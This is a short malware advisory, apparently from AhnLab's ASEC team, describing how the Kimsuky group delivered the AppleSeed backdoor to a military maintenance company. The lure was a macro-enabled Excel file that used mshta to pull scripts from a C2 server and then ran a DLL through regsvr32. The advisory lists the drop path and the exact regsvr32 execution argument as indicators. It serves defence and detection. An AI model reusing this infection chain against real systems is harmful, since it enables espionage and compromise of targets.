The ASEC analysis team has recently discovered a case of AppleSeed being distributed to a certain maintenance company of military bases. AppleSeed is a backdoor malware mainly used by the Kimsuky group and is actively being distributed to multiple attack targets as of late.
In this case, the malware was distributed with a file under the name of a military base.
- 20220713_**** base_installation planned dateV004_*** edited_6.xls
AppleSeed was distributed as an Excel file (XLS) and protected with a password to bypass anti-malware software.
When opening the XLS file, users are prompted to enable the external content as in Figure 2. Clicking the Enable Content button will open the macro-enabled content as in Figure 3.
The macro hides the information that prompts the user to enable content to display the original file. It then uses mshta to download and run additional scripts from a C2.
The scripts contain a routine for downloading and executing AppleSeed, which is saved in the following path.
- Path: %ProgramData%\Software\ControlSet\Service\ServiceScheduler.dll
- Execution Argument: regsvr32.exe /s /n /i:12345QWERTY [AppleSeed path]
When AppleSeed is run, it can continuously receive commands from the C2 server to download and run additional modules or perform behaviors that the attacker wants. For a detailed analysis of AppleSeed, click the link.
The Kimsuky group which mainly employs AppleSeed is attempting various methods to increase their chance of attack success. Users should take caution not to run attachments of emails sent from unknown sources and only enable macros from reliable sources.
AhnLab’s anti-malware software, V3, is currently detecting and blocking the files using the following aliases.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.